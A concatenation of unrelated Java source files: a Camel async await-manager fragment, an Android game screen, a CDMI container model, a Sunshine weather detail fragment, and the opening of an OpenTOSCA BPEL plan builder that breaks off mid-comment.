sb.append(style("Id:")).append(entry.getBlockedThread().getId()).append("\n");
sb.append(style("Name:")).append(entry.getBlockedThread().getName()).append("\n");
sb.append(style("RouteId:")).append(safeNull(entry.getRouteId())).append("\n");
sb.append(style("NodeId:")).append(safeNull(entry.getNodeId())).append("\n");
sb.append(style("Duration:")).append(entry.getWaitDuration()).append(" msec.\n");
return sb.toString();
}
private static String style(String label) {
return String.format("\t%-20s", label);
}
private static String safeNull(Object value) {
return value != null ? value.toString() : "";
}
private static final class AwaitThreadEntry implements AwaitThread {
private final Thread thread;
private final Exchange exchange;
private final CountDownLatch latch;
private final long start;
private AwaitThreadEntry(Thread thread, Exchange exchange, CountDownLatch latch) {
this.thread = thread;
this.exchange = exchange;
this.latch = latch;
this.start = System.currentTimeMillis();
}
@Override
public Thread getBlockedThread() {
return thread;
}
@Override
public Exchange getExchange() {
return exchange;
}
@Override
public long getWaitDuration() {
return System.currentTimeMillis() - start;
}
@Override
public String getRouteId() {
MessageHistory lastMessageHistory = getLastMessageHistory();
if (lastMessageHistory == null) {
return null;
}
return lastMessageHistory.getRouteId();
}
@Override
public String getNodeId() {
NamedNode node = getNode();
if (node == null) {
return null;
}
return node.getId();
}
public CountDownLatch getLatch() {
return latch;
}
private NamedNode getNode() {
MessageHistory lastMessageHistory = getLastMessageHistory();
if (lastMessageHistory == null) {
return null;
}
return lastMessageHistory.getNode();
}
private MessageHistory getLastMessageHistory() {
LinkedList<MessageHistory> list = getMessageHistories();
if (list == null || list.isEmpty()) {
return null;
}
return list.getLast();
}
private LinkedList<MessageHistory> getMessageHistories() {
return exchange.getProperty(Exchange.MESSAGE_HISTORY, LinkedList.class);
}
@Override
public String toString() {
return "AwaitThreadEntry[name=" + thread.getName() + ", exchangeId=" + exchange.getExchangeId() + "]";
}
}
/**
* Represents utilization statistics
*/
private final class UtilizationStatistics implements AsyncProcessorAwaitManager.Statistics {
private boolean statisticsEnabled;
@Override
public long getThreadsBlocked() {
return blockedCounter.get();
}
@Override
public long getThreadsInterrupted() {
return interruptedCounter.get();
}
@Override
public long getTotalDuration() {
return totalDuration.get();
}
@Override
public long getMinDuration() {
return minDuration.get();
}
@Override
public long getMaxDuration() {
return maxDuration.get();
}
@Override
public long getMeanDuration() {
return meanDuration.get();
}
@Override
public void reset() {
blockedCounter.set(0);
interruptedCounter.set(0);
totalDuration.set(0);
minDuration.set(0);
maxDuration.set(0);
meanDuration.set(0);
}
@Override
public boolean isStatisticsEnabled() {
return statisticsEnabled;
}
@Override
public void setStatisticsEnabled(boolean statisticsEnabled) {
this.statisticsEnabled = statisticsEnabled;
}
@Override
public String toString() {
return String.format("AsyncProcessAwaitManager utilization[blocked=%s, interrupted=%s, total=%s min=%s, max=%s, mean=%s]",
getThreadsBlocked(), getThreadsInterrupted(), getTotalDuration(), getMinDuration(), getMaxDuration(), getMeanDuration());
}
}
}
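// Usage sketch (illustrative, not Camel API documentation): the intended pairing of
// await(...) and countDown(...). The Exchange instance is assumed to be created by a
// running CamelContext; the class and method names below are local to this sketch.
import java.util.concurrent.CountDownLatch;
import org.apache.camel.Exchange;
import org.apache.camel.impl.DefaultAsyncProcessorAwaitManager;

class AwaitManagerUsageSketch {
    void blockUntilCallback(DefaultAsyncProcessorAwaitManager awaitManager, Exchange exchange) {
        CountDownLatch latch = new CountDownLatch(1);
        // Simulated asynchronous completion: another thread releases the blocked caller
        // through the manager so the blocked/duration statistics stay consistent.
        new Thread(() -> awaitManager.countDown(exchange, latch)).start();
        // Blocks the current thread and registers it as an inflight AwaitThread until the
        // latch is counted down (or the thread is released via interrupt(exchange)).
        awaitManager.await(exchange, latch);
    }
}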
|
|
package com.github.kolandroid.kol.android.game;
import android.annotation.SuppressLint;
import android.app.DialogFragment;
import android.app.Fragment;
import android.app.FragmentTransaction;
import android.os.Bundle;
import android.support.v4.widget.DrawerLayout;
import android.support.v7.app.ActionBar;
import android.support.v7.app.ActionBar.LayoutParams;
import android.view.Menu;
import android.view.View;
import android.widget.ProgressBar;
import android.widget.TextView;
import com.github.kolandroid.kol.android.R;
import com.github.kolandroid.kol.android.controller.Controller;
import com.github.kolandroid.kol.android.controller.ModelController;
import com.github.kolandroid.kol.android.controller.UpdatableController;
import com.github.kolandroid.kol.android.controller.UpdateController;
import com.github.kolandroid.kol.android.controllers.chat.ChatCounterController;
import com.github.kolandroid.kol.android.controllers.stats.StatsGlanceController;
import com.github.kolandroid.kol.android.controllers.web.WebController;
import com.github.kolandroid.kol.android.screen.ActivityScreen;
import com.github.kolandroid.kol.android.screen.DialogScreen;
import com.github.kolandroid.kol.android.screen.DrawerScreen;
import com.github.kolandroid.kol.android.screen.FragmentScreen;
import com.github.kolandroid.kol.android.screen.ScreenSelection;
import com.github.kolandroid.kol.android.screen.ViewScreen;
import com.github.kolandroid.kol.android.util.HandlerCallback;
import com.github.kolandroid.kol.android.view.AndroidViewContext;
import com.github.kolandroid.kol.android.view.PopupLoader;
import com.github.kolandroid.kol.gamehandler.LoadingContext;
import com.github.kolandroid.kol.model.Model;
import com.github.kolandroid.kol.model.models.stats.StatsGlanceModel;
import com.github.kolandroid.kol.session.Session;
import com.github.kolandroid.kol.util.Logger;
public class GameScreen extends ActivityScreen {
private StatsGlanceController stats;
private SidebarController sidebar;
private DrawerScreen navigationScreen;
private HandlerCallback<Void> sidebarUpdater;
private LoadingContext loader;
private Controller chatIconController;
@Override
protected AndroidViewContext createViewContext() {
// Set up the bottom loading bar
View base = this.findViewById(R.id.game_progress_popup);
ProgressBar bar = (ProgressBar) this
.findViewById(R.id.game_progress_bar);
TextView text = (TextView) this.findViewById(R.id.game_progress_text);
base.setVisibility(View.GONE);
PopupLoader loader = new PopupLoader(base, bar, text);
return new AndroidViewContext(this, loader, this.getClass());
}
@Override
public Controller setup(Bundle savedInstanceState, Controller controller) {
Session session = null;
if (controller != null && controller instanceof ModelController) {
// Load the session for the provided model
@SuppressWarnings("unchecked")
ModelController<? extends Model> c = (ModelController<? extends Model>) controller;
Model model = c.getModel();
session = model.getSession();
}
// Set up the chat icon.
if (savedInstanceState != null && savedInstanceState.containsKey("chat_controller")) {
chatIconController = (ChatCounterController) savedInstanceState.getSerializable("chat_controller");
} else if (session != null) {
chatIconController = new ChatCounterController(session);
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
// Set up the drawer.
if (savedInstanceState != null && savedInstanceState.containsKey("sidebar_controller")) {
sidebar = (SidebarController) savedInstanceState.getSerializable("sidebar_controller");
} else if (session != null) {
sidebar = new SidebarController(session);
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
// Set up the stats pane.
if (savedInstanceState != null && savedInstanceState.containsKey("stats_controller")) {
stats = (StatsGlanceController) savedInstanceState.get("stats_controller");
} else if (session != null) {
stats = new StatsGlanceController(new StatsGlanceModel(session));
} else {
Logger.log("GameScreen", "Controller " + controller + " has no session; cannot be used to start GameScreen");
}
if (stats != null && sidebar != null) {
sidebarUpdater = new UpdateSidebarHandler(sidebar);
stats.attachNotificationCallback(sidebarUpdater.weak());
}
if (sidebar != null) {
navigationScreen = DrawerScreen.create(sidebar);
getFragmentManager().beginTransaction()
.replace(R.id.navigation_drawer, navigationScreen).commit();
navigationScreen.setUp(this, R.id.navigation_drawer,
(DrawerLayout) findViewById(R.id.drawer_layout), R.drawable.ic_map_black_24dp);
}
ActionBar actionBar = getSupportActionBar();
if (actionBar != null && stats != null) {
actionBar.setDisplayShowCustomEnabled(true);
actionBar.setDisplayShowTitleEnabled(false);
ViewScreen statsScreen = new ViewScreen(this);
statsScreen.display(stats, this);
//Set the custom view to fill the action bar
LayoutParams params = new LayoutParams(LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT);
actionBar.setCustomView(statsScreen, params);
}
return controller;
}
@Override
protected void displayController(Controller c, final boolean addToBackStack) {
Fragment dialog = getFragmentManager().findFragmentByTag("dialog");
if (dialog != null && dialog instanceof DialogFragment) {
Logger.log("GameScreen", "Dismissing dialog box");
((DialogFragment) dialog).dismiss();
}
c.chooseScreen(new ScreenSelection() {
@Override
public void displayExternal(Controller c) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on an external screen. Rerouting...");
displayPrimary(c, false);
}
@Override
public void displayExternalDialog(Controller c, boolean cancellable) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on an external dialog. Rerouting...");
displayDialog(c);
}
@Override
public void displayPrimaryUpdate(UpdateController c, boolean displayIfUnable) {
// We have to do a more complicated check to see if the same controller type is currently displayed
Fragment current = getFragmentManager().findFragmentByTag("game_screen");
if (current != null && current instanceof FragmentScreen) {
Controller currentController = ((FragmentScreen) current).getController();
if (currentController != null && currentController instanceof UpdatableController) {
UpdatableController toUpdate = (UpdatableController) currentController;
if (toUpdate.tryApply(c.getUpdateType(), c.getModel())) {
Logger.log("GameScreen", "Update " + c + " applied to " + toUpdate);
refreshStatsPane();
return;
}
Logger.log("GameScreen", "Unable to apply update " + c + " to " + toUpdate);
}
}
if (displayIfUnable) {
displayPrimary(c);
}
}
@Override
public void displayChat(Controller c) {
Logger.log("GameScreen", "ERROR: Controller " + c + " has chosen to appear on in the chat. Ignoring.");
}
private void displayPrimary(Controller c, boolean addToBackStack) {
FragmentScreen screen = FragmentScreen.create(c);
@SuppressLint("CommitTransaction") FragmentTransaction trans = getFragmentManager()
.beginTransaction().replace(R.id.game_main_screen, screen, "game_screen");
if (addToBackStack) {
Logger.log("GameScreen", "History saved");
trans = trans.addToBackStack("a");
}
trans.commit();
if (!(c instanceof WebController)) {
refreshStatsPane();
}
}
@Override
public void displayPrimary(Controller c) {
Logger.log("GameScreen", "Displaying " + c + " on primary pane");
displayPrimary(c, addToBackStack);
}
@Override
public void displayDialog(Controller c) {
Logger.log("GameScreen", "Displaying " + c + " on new dialog box");
DialogScreen.display(c, GameScreen.this);
}
});
}
@Override
protected int getContentView() {
return R.layout.activity_game_view;
}
public void refreshStatsPane() {
if (stats != null)
stats.refresh();
}
@Override
public void onSaveInstanceState(Bundle savedInstanceState) {
super.onSaveInstanceState(savedInstanceState);
savedInstanceState.putSerializable("stats_controller", stats);
savedInstanceState.putSerializable("sidebar_controller", sidebar);
savedInstanceState.putSerializable("chat_controller", chatIconController);
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.game_screen, menu);
View chatIconView = menu.findItem(R.id.action_chat).getActionView();
if (chatIconController != null) {
chatIconController.attach(chatIconView, this);
chatIconController.connect(chatIconView, this);
}
return true;
}
@Override
public void onDestroy() {
super.onDestroy();
if (chatIconController != null) {
chatIconController.disconnect(this);
}
if (sidebarUpdater != null) {
sidebarUpdater.close();
sidebarUpdater = null;
}
}
@Override
public void onBackPressed() {
//This appears to be necessary to make fragment backtracking actually work without the v4 support library...
// Close the navigation drawer if open
if (navigationScreen != null && navigationScreen.isOpen()) {
navigationScreen.close();
return;
}
// Attempt to pop the next fragment off the stack
if (!getFragmentManager().popBackStackImmediate()) {
//TODO: replace with Logout? message
super.onBackPressed();
}
}
}
|
|
/*
* Original work Copyright (c) 2010, Sun Microsystems, Inc. Copyright (c) 2010, The Storage
* Networking Industry Association.
*
* Modified work Copyright (c) 2016, Karlsruhe Institute of Technology (KIT)
*
* Redistribution and use in source and binary forms, with or without modification, are permitted
* provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of conditions
* and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions
* and the following disclaimer in the documentation and/or other materials provided with the
* distribution.
*
* Neither the name of The Storage Networking Industry Association (SNIA) nor the names of its
* contributors may be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
* FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
* WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
* WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.snia.cdmiserver.model;
import org.json.JSONArray;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.snia.cdmiserver.util.MediaTypes;
/**
* <p>
* Representation of a CDMI <em>Container</em>.
* </p>
*/
public class Container extends CdmiObject {
@SuppressWarnings("unused")
private static final Logger LOG = LoggerFactory.getLogger(Container.class);
private String objectType;
private String objectName;
private String parentUri;
private String parentId;
private String domainUri;
private String capabilitiesUri;
private String completionStatus;
private String percentComplete;
private JSONObject metadata;
private JSONObject exports;
private JSONArray snapshots;
private String childrenrange;
private JSONArray children;
private String deserializevalue;
private String reference;
private String move;
private String copy;
private String deserialize;
private Container() {}
/**
* Creates a new container with the mandatory fields.
*
* @param objectName the container's name
* @param parentUri the container's parent URI
* @param parentId the container's parent objectId
*/
public Container(String objectName, String parentUri, String parentId) {
super();
this.objectName = objectName;
this.parentUri = parentUri;
this.parentId = parentId;
// default values
this.objectType = MediaTypes.CONTAINER;
this.domainUri = "/cdmi_domains";
this.capabilitiesUri = "/cdmi_capabilities/container";
this.completionStatus = "Complete";
this.metadata = new JSONObject();
this.children = new JSONArray();
this.childrenrange = "";
}
public String getObjectType() {
return objectType;
}
public void setObjectType(String objectType) {
this.objectType = objectType;
}
public String getObjectName() {
return objectName;
}
public void setObjectName(String objectName) {
this.objectName = objectName;
}
public String getParentUri() {
return parentUri;
}
public void setParentUri(String parentUri) {
this.parentUri = parentUri;
}
public String getParentId() {
return parentId;
}
public void setParentId(String parentId) {
this.parentId = parentId;
}
public String getDomainUri() {
return domainUri;
}
public void setDomainUri(String domainUri) {
this.domainUri = domainUri;
}
public String getCapabilitiesUri() {
return capabilitiesUri;
}
public void setCapabilitiesUri(String capabilitiesUri) {
this.capabilitiesUri = capabilitiesUri;
}
public String getCompletionStatus() {
return completionStatus;
}
public void setCompletionStatus(String completionStatus) {
this.completionStatus = completionStatus;
}
public String getPercentComplete() {
return percentComplete;
}
public void setPercentComplete(String percentComplete) {
this.percentComplete = percentComplete;
}
public JSONObject getMetadata() {
return metadata;
}
public void setMetadata(JSONObject metadata) {
this.metadata = metadata;
}
public JSONObject getExports() {
return exports;
}
public void setExports(JSONObject exports) {
this.exports = exports;
}
public JSONArray getSnapshots() {
return snapshots;
}
public void setSnapshots(JSONArray snapshots) {
this.snapshots = snapshots;
}
public String getChildrenrange() {
return childrenrange;
}
public void setChildrenrange(String childrenrange) {
this.childrenrange = childrenrange;
}
public JSONArray getChildren() {
return children;
}
public void setChildren(JSONArray children) {
this.children = children;
}
public String getDeserializedvalue() {
return deserializevalue;
}
public void setDeserializedvalue(String deserializevalue) {
this.deserializevalue = deserializevalue;
}
public String getReference() {
return reference;
}
public void setReference(String reference) {
this.reference = reference;
}
public String getMove() {
return move;
}
public void setMove(String move) {
this.move = move;
}
public String getCopy() {
return copy;
}
public void setCopy(String copy) {
this.copy = copy;
}
public String getDeserialize() {
return deserialize;
}
public void setDeserialize(String deserialize) {
this.deserialize = deserialize;
}
  /**
   * Deserializes a container from the given JSON object.
   *
   * @param json a {@link JSONObject} in CDMI container representation
   * @return the deserialized {@link Container}
   */
public static Container fromJson(JSONObject json) {
Container container = new Container();
if (json.has("objectID")) {
container.setObjectId(json.optString("objectID"));
}
if (json.has("objectName")) {
container.objectName = json.optString("objectName");
}
if (json.has("parentURI")) {
container.parentUri = json.optString("parentURI");
}
if (json.has("parentID")) {
container.parentId = json.optString("parentID");
}
// default values
container.objectType = MediaTypes.CONTAINER;
container.domainUri = json.optString("domainURI", "/cdmi_domains");
container.capabilitiesUri = json.optString("capabilitiesURI", "/cdmi_capabilities/container");
container.completionStatus = json.optString("completionStatus", "Processing");
container.metadata = json.optJSONObject("metadata");
container.children = new JSONArray();
if (container.metadata == null) {
container.metadata = new JSONObject();
}
// optional values
if (json.has("percentComplete")) {
container.percentComplete = json.optString("percentComplete");
}
if (json.has("exports")) {
container.exports = json.optJSONObject("exports");
}
if (json.has("snapshots")) {
container.snapshots = json.optJSONArray("snapshots");
}
if (json.has("childrenrange")) {
container.childrenrange = json.optString("childrenrange");
}
if (json.has("children")) {
container.children = json.optJSONArray("children");
}
if (json.has("deserializevalue")) {
container.deserializevalue = json.optString("deserializevalue");
}
if (json.has("reference")) {
container.reference = json.optString("reference");
}
if (json.has("move")) {
container.move = json.optString("move");
}
if (json.has("copy")) {
container.copy = json.optString("copy");
}
if (json.has("deserialize")) {
container.deserialize = json.optString("deserialize");
}
return container;
}
@Override
public JSONObject toJson() {
JSONObject json = super.toJson();
json.putOpt("objectType", objectType);
json.putOpt("objectName", objectName);
json.putOpt("parentURI", parentUri);
json.putOpt("parentID", parentId);
json.putOpt("domainURI", domainUri);
json.putOpt("capabilitiesURI", capabilitiesUri);
json.putOpt("completionStatus", completionStatus);
json.putOpt("percentComplete", percentComplete);
json.putOpt("metadata", metadata);
json.putOpt("exports", exports);
json.putOpt("snapshots", snapshots);
json.putOpt("childrenrange", childrenrange);
json.putOpt("children", children);
json.putOpt("deserializevalue", deserializevalue);
json.putOpt("reference", reference);
json.putOpt("move", move);
json.putOpt("copy", copy);
json.putOpt("deserialize", deserialize);
return json;
}
@Override
public String toString() {
return "Container [objectId=" + getObjectId() + ", "
+ (objectType != null ? "objectType=" + objectType + ", " : "")
+ (objectName != null ? "objectName=" + objectName + ", " : "")
+ (parentUri != null ? "parentUri=" + parentUri + ", " : "")
+ (parentId != null ? "parentId=" + parentId + ", " : "")
+ (domainUri != null ? "domainUri=" + domainUri + ", " : "")
+ (capabilitiesUri != null ? "capabilitiesUri=" + capabilitiesUri + ", " : "")
+ (completionStatus != null ? "completionStatus=" + completionStatus + ", " : "")
+ (percentComplete != null ? "percentComplete=" + percentComplete + ", " : "")
+ (metadata != null ? "metadata=" + metadata + ", " : "")
+ (exports != null ? "exports=" + exports + ", " : "")
+ (snapshots != null ? "snapshots=" + snapshots + ", " : "")
+ (childrenrange != null ? "childrenrange=" + childrenrange + ", " : "")
+ (children != null ? "children=" + children + ", " : "")
+ (deserializevalue != null ? "deserializevalue=" + deserializevalue + ", " : "")
+ (reference != null ? "reference=" + reference + ", " : "")
+ (move != null ? "move=" + move + ", " : "") + (copy != null ? "copy=" + copy + ", " : "")
+ (deserialize != null ? "deserialize=" + deserialize : "") + "]";
}
}
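// Round-trip sketch (illustrative): building a Container, serializing it with toJson(), and
// reading it back with fromJson(). The field values here are made up; only the constructor
// and method contracts shown above are relied upon.
import org.json.JSONObject;
import org.snia.cdmiserver.model.Container;

class ContainerJsonRoundTripSketch {
    static Container roundTrip() {
        Container original = new Container("reports", "/rootContainer/", "parent-object-id");
        original.getMetadata().put("cdmi_owner", "alice");  // metadata starts as an empty JSONObject
        JSONObject wireFormat = original.toJson();           // keys follow CDMI naming (parentURI, domainURI, ...)
        return Container.fromJson(wireFormat);               // optional keys absent from the JSON remain null
    }
}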
|
|
package com.example.android.sunshine.app;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.LoaderManager;
import android.support.v4.content.CursorLoader;
import android.support.v4.content.Loader;
import android.support.v4.view.MenuItemCompat;
import android.support.v7.widget.ShareActionProvider;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuInflater;
import android.view.MenuItem;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import com.example.android.sunshine.app.data.WeatherContract;
import com.example.android.sunshine.app.data.WeatherContract.WeatherEntry;
/**
 * Fragment that displays the detailed forecast for a single day and exposes a share action.
 */
public class DetailFragment extends Fragment implements LoaderManager.LoaderCallbacks<Cursor> {
private static final String LOG_TAG = DetailFragment.class.getSimpleName();
private static final String FORECAST_SHARE_HASHTAG = " #SunshineApp";
public static final String DETAIL_URI = "URI";
private ShareActionProvider mShareActionProvider;
private String mForecast;
private Uri mUri;
private static final int DETAIL_LOADER = 0;
private static final String[] DETAIL_COLUMNS = {
WeatherEntry.TABLE_NAME + "." + WeatherEntry._ID,
WeatherEntry.COLUMN_DATE,
WeatherEntry.COLUMN_SHORT_DESC,
WeatherEntry.COLUMN_MAX_TEMP,
WeatherEntry.COLUMN_MIN_TEMP,
WeatherEntry.COLUMN_HUMIDITY,
WeatherEntry.COLUMN_PRESSURE,
WeatherEntry.COLUMN_WIND_SPEED,
WeatherEntry.COLUMN_DEGREES,
WeatherEntry.COLUMN_WEATHER_ID,
// This works because the WeatherProvider returns location data joined with
// weather data, even though they're stored in two different tables.
WeatherContract.LocationEntry.COLUMN_LOCATION_SETTING
};
// These indices are tied to DETAIL_COLUMNS. If DETAIL_COLUMNS changes, these
// must change.
public static final int COL_WEATHER_ID = 0;
public static final int COL_WEATHER_DATE = 1;
public static final int COL_WEATHER_DESC = 2;
public static final int COL_WEATHER_MAX_TEMP = 3;
public static final int COL_WEATHER_MIN_TEMP = 4;
public static final int COL_WEATHER_HUMIDITY = 5;
public static final int COL_WEATHER_PRESSURE = 6;
public static final int COL_WEATHER_WIND_SPEED = 7;
public static final int COL_WEATHER_DEGREES = 8;
public static final int COL_WEATHER_CONDITION_ID = 9;
private ImageView mIconView;
private TextView mFriendlyDateView;
private TextView mDateView;
private TextView mDescriptionView;
private TextView mHighTempView;
private TextView mLowTempView;
private TextView mHumidityView;
private TextView mWindView;
private TextView mPressureView;
public DetailFragment() {
setHasOptionsMenu(true);
}
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
Bundle args = getArguments();
if (args != null) {
mUri = args.getParcelable(DETAIL_URI);
}
View rootView = inflater.inflate(R.layout.fragment_detail, container, false);
mIconView = (ImageView) rootView.findViewById(R.id.detail_icon);
mDateView = (TextView) rootView.findViewById(R.id.detail_date_textview);
mFriendlyDateView = (TextView) rootView.findViewById(R.id.detail_day_textview);
mDescriptionView = (TextView) rootView.findViewById(R.id.detail_forecast_textview);
mHighTempView = (TextView) rootView.findViewById(R.id.detail_high_textview);
mLowTempView = (TextView) rootView.findViewById(R.id.detail_low_textview);
mHumidityView = (TextView) rootView.findViewById(R.id.detail_humidity_textview);
mWindView = (TextView) rootView.findViewById(R.id.detail_wind_textview);
mPressureView = (TextView) rootView.findViewById(R.id.detail_pressure_textview);
return rootView;
}
@Override
public void onCreateOptionsMenu(Menu menu, MenuInflater inflater) {
// Inflate the menu; this adds items to the action bar if it is present.
inflater.inflate(R.menu.detailfragment, menu);
// Retrieve the share menu item
MenuItem menuItem = menu.findItem(R.id.action_share);
// Get the provider and hold onto it to set/change the share intent.
mShareActionProvider = (ShareActionProvider) MenuItemCompat.getActionProvider(menuItem);
// If onLoadFinished happens before this, we can go ahead and set the share intent now.
if (mForecast != null) {
mShareActionProvider.setShareIntent(createShareForecastIntent());
}
}
private Intent createShareForecastIntent() {
Intent shareIntent = new Intent(Intent.ACTION_SEND);
shareIntent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_WHEN_TASK_RESET);
shareIntent.setType("text/plain");
shareIntent.putExtra(Intent.EXTRA_TEXT, mForecast + FORECAST_SHARE_HASHTAG);
return shareIntent;
}
@Override
public void onActivityCreated(Bundle savedInstanceState) {
getLoaderManager().initLoader(DETAIL_LOADER, null, this);
super.onActivityCreated(savedInstanceState);
}
@Override
public Loader<Cursor> onCreateLoader(int id, Bundle args) {
if (mUri != null) {
// Now create and return a CursorLoader that will take care of
// creating a Cursor for the data being displayed.
return new CursorLoader(
getActivity(),
mUri,
DETAIL_COLUMNS,
null,
null,
null
);
}
return null;
}
@Override
public void onLoadFinished(Loader<Cursor> loader, Cursor data) {
if (data != null && data.moveToFirst()) {
// Read weather condition ID from cursor
int weatherId = data.getInt(COL_WEATHER_CONDITION_ID);
int weatherImgResource = Utility.getArtResourceForWeatherCondition(weatherId);
            // Set the art image for the weather condition
mIconView.setImageResource(weatherImgResource);
// Read date from cursor and update views for day of week and date
long date = data.getLong(COL_WEATHER_DATE);
String friendlyDateText = Utility.getDayName(getActivity(), date);
String dateText = Utility.getFormattedMonthDay(getActivity(), date);
mFriendlyDateView.setText(friendlyDateText);
mDateView.setText(dateText);
// Read description from cursor and update view
String description = data.getString(COL_WEATHER_DESC);
mDescriptionView.setText(description);
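            // Read high temperature from cursor and update view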
double high = data.getDouble(COL_WEATHER_MAX_TEMP);
String highString = Utility.formatTemperature(getActivity(), high);
mHighTempView.setText(highString);
// Read low temperature from cursor and update view
double low = data.getDouble(COL_WEATHER_MIN_TEMP);
String lowString = Utility.formatTemperature(getActivity(), low);
mLowTempView.setText(lowString);
// Read humidity from cursor and update view
float humidity = data.getFloat(COL_WEATHER_HUMIDITY);
mHumidityView.setText(getActivity().getString(R.string.format_humidity, humidity));
// Read wind speed and direction from cursor and update view
float windSpeedStr = data.getFloat(COL_WEATHER_WIND_SPEED);
float windDirStr = data.getFloat(COL_WEATHER_DEGREES);
mWindView.setText(Utility.getFormattedWind(getActivity(), windSpeedStr, windDirStr));
// Read pressure from cursor and update view
float pressure = data.getFloat(COL_WEATHER_PRESSURE);
mPressureView.setText(getActivity().getString(R.string.format_pressure, pressure));
// We still need this for the share intent
mForecast = String.format("%s - %s - %s/%s", dateText, description, high, low);
// If onCreateOptionsMenu has already happened, we need to update the share intent now.
if (mShareActionProvider != null) {
mShareActionProvider.setShareIntent(createShareForecastIntent());
}
}
}
@Override
public void onLoaderReset(Loader<Cursor> loader) { }
public void onLocationChanged( String newLocation ) {
// replace the uri, since the location has changed
Uri uri = mUri;
if (null != uri) {
long date = WeatherContract.WeatherEntry.getDateFromUri(uri);
Uri updatedUri = WeatherContract.WeatherEntry.buildWeatherLocationWithDate(newLocation, date);
mUri = updatedUri;
getLoaderManager().restartLoader(DETAIL_LOADER, null, this);
}
}
}
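// Construction sketch (illustrative): how a host activity or pane could hand the detail URI
// to this fragment via the DETAIL_URI argument key. `dateUri` is an assumed weather-with-date
// content URI built elsewhere (e.g. by WeatherContract.WeatherEntry.buildWeatherLocationWithDate).
import android.net.Uri;
import android.os.Bundle;
import com.example.android.sunshine.app.DetailFragment;

class DetailFragmentFactorySketch {
    static DetailFragment newInstance(Uri dateUri) {
        Bundle args = new Bundle();
        args.putParcelable(DetailFragment.DETAIL_URI, dateUri);  // read back in onCreateView via getArguments()
        DetailFragment fragment = new DetailFragment();
        fragment.setArguments(args);
        return fragment;
    }
}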
|
|
package org.opentosca.planbuilder.core.bpel.typebasedplanbuilder;
import java.util.ArrayList;
import java.util.List;
import javax.xml.namespace.QName;
import javax.xml.parsers.ParserConfigurationException;
import org.eclipse.winery.model.tosca.TDefinitions;
import org.eclipse.winery.model.tosca.TNodeTemplate;
import org.eclipse.winery.model.tosca.TRelationshipTemplate;
import org.eclipse.winery.model.tosca.TServiceTemplate;
import org.opentosca.container.core.convention.Types;
import org.opentosca.container.core.model.ModelUtils;
import org.opentosca.container.core.model.csar.Csar;
import org.opentosca.planbuilder.core.AbstractBuildPlanBuilder;
import org.opentosca.planbuilder.core.ChoreographyBuilder;
import org.opentosca.planbuilder.core.bpel.artifactbasednodehandler.BPELScopeBuilder;
import org.opentosca.planbuilder.core.bpel.context.BPELPlanContext;
import org.opentosca.planbuilder.core.bpel.handlers.BPELFinalizer;
import org.opentosca.planbuilder.core.bpel.handlers.BPELPlanHandler;
import org.opentosca.planbuilder.core.bpel.handlers.CorrelationIDInitializer;
import org.opentosca.planbuilder.core.bpel.handlers.EmptyPropertyToInputHandler;
import org.opentosca.planbuilder.core.bpel.handlers.NodeRelationInstanceVariablesHandler;
import org.opentosca.planbuilder.core.bpel.handlers.PropertyVariableHandler;
import org.opentosca.planbuilder.core.bpel.handlers.ServiceTemplateBoundaryPropertyMappingsToOutputHandler;
import org.opentosca.planbuilder.core.bpel.handlers.SimplePlanBuilderServiceInstanceHandler;
import org.opentosca.planbuilder.core.bpel.handlers.SituationTriggerRegistration;
import org.opentosca.planbuilder.core.bpel.typebasednodehandler.BPELPluginHandler;
import org.opentosca.planbuilder.core.plugins.context.Property2VariableMapping;
import org.opentosca.planbuilder.core.plugins.registry.PluginRegistry;
import org.opentosca.planbuilder.core.plugins.typebased.IPlanBuilderPostPhasePlugin;
import org.opentosca.planbuilder.model.plan.AbstractPlan;
import org.opentosca.planbuilder.model.plan.bpel.BPELPlan;
import org.opentosca.planbuilder.model.plan.bpel.BPELScope;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import static org.opentosca.container.core.convention.PlanConstants.OpenTOSCA_BuildPlanOperation;
import static org.opentosca.container.core.convention.PlanConstants.OpenTOSCA_LifecycleInterface;
/**
* <p>
* This Class represents the high-level algorithm of the concept in <a href= "http://www2.informatik.uni-stuttgart.de/cgi-bin/NCSTRL/NCSTRL_view.pl?id=BCLR-0043&mod=0&engl=1&inst=FAK"
* >Konzept und Implementierung eine Java-Komponente zur Generierung von WS-BPEL 2.0 BuildPlans fuer OpenTOSCA</a>. It
* is responsible for generating the Build Plan Skeleton and assign plugins to handle the different templates inside a
